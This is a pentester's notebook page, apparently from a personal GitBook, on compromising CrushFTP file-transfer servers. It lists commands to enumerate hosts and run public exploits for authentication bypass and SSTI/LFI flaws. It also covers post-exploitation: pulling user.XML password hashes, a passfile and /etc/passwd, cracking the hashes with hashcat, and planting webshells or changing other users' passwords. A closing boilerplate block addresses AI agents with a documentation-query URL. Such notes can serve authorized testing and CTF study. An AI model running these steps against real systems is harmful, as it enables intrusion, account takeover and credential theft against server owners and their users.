> For the complete documentation index, see [llms.txt](https://book.ice-wzl.xyz/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://book.ice-wzl.xyz/things-i-have-pwnd-before/crushftp.md).

# CrushFTP

Enterprise file transfer server - often runs in Docker containers.

**Common Paths:** `/WebInterface/login.html`, subdomain `ftp.domain.com`

***

## Discovery

```bash
# VHost enumeration
gobuster vhost --url http://TARGET -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain

# Common subdomain
ftp.TARGET
```

**Indicators:**

* Login page redirects to `/WebInterface/login.html`
* Server header: `CrushFTP HTTP Server`
* Cookie names: `CrushAuth`, `currentAuth`

***

## CVE-2025-31161 - Authentication Bypass (Race Condition)

**Affects:** CrushFTP 10.x, 11.x before 11.3.1

Enumerate users and create arbitrary accounts via race condition.

### Exploits

```bash
# Go version (recommended)
git clone https://github.com/0xDTC/CrushFTP-auth-bypass-CVE-2025-31161.git
cd CrushFTP-auth-bypass-CVE-2025-31161

# Enumerate users and create account
./cve-2025-31161 -p 80 -t ftp.TARGET -au
# Enter username and password when prompted

# Python version (user enumeration)
git clone https://github.com/watchtowrlabs/watchTowr-vs-CrushFTP-Authentication-Bypass-CVE-2025-54309.git
python3 watchTowr-vs-CrushFTP-CVE-2025-54309.py http://ftp.TARGET
```

### Manual User Enumeration

Race condition on `getUserList` endpoint reveals usernames:

```
[*] EXFILTRATED 5 USERS: ben, crushadmin, default, jenna, TempAccount
```

***

## CVE-2024-4040 - SSTI/LFI

**Affects:** CrushFTP < 10.7.1, < 11.1.0

```bash
git clone https://github.com/Stuub/CVE-2024-4040-SSTI-LFI-PoC.git
python3 crushed.py -t http://ftp.TARGET
```

***

## Post-Exploitation (After Login)

### File Download

1. Login to CrushFTP web interface
2. Go to User Preferences → Browse server files
3. Add files/directories to your user's accessible paths
4. Return to main page and download

### Key Files to Grab

```
/app/CrushFTP11/users/MainUsers/*/user.XML    # User configs with password hashes
/app/CrushFTP11/users/passfile                 # May contain plaintext passwords
/etc/passwd
/etc/hosts
```

### User.XML Password Hash Extraction

```xml
<!-- SHA256 format -->
<password>SHA256:d9eca4956a9d757ba0f007403f73b0d40d79be5d1fba36bc6ce64f98d9c9e88d</password>

<!-- SHA512 format -->
<password>SHA512:eeaeabe70899e53be528455a16fb797cfa74cba4f63d8a1980072a2a8f175db5269525283da852ce9f24cd407e4c63256aa383cac5b59da9bf1664d4d30359a6</password>
```

### Cracking CrushFTP Hashes

```bash
# SHA256 (mode 1400)
hashcat -a 0 -m 1400 hash.txt /usr/share/wordlists/rockyou.txt

# SHA512 (mode 1700)
hashcat -a 0 -m 1700 hash.txt /usr/share/wordlists/rockyou.txt
```

***

## Pivoting via CrushFTP

If you have admin access:

* Change other user's passwords
* Upload files to web directories for webshell access
* Check which directories users can write to

***

## Config Paths

```
/app/CrushFTP11/
├── users/
│   ├── MainUsers/
│   │   ├── crushadmin/user.XML
│   │   ├── ben/user.XML
│   │   └── jenna/user.XML
│   └── passfile
├── prefs.XML
└── server_settings.XML
```

***

## Notes

* Often runs in Docker (check `/etc/hosts`, `os-release`)
* Password reuse common between CrushFTP and SSH
* Admin accounts may have access to entire filesystem (`root_dir: /`)


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://book.ice-wzl.xyz/things-i-have-pwnd-before/crushftp.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.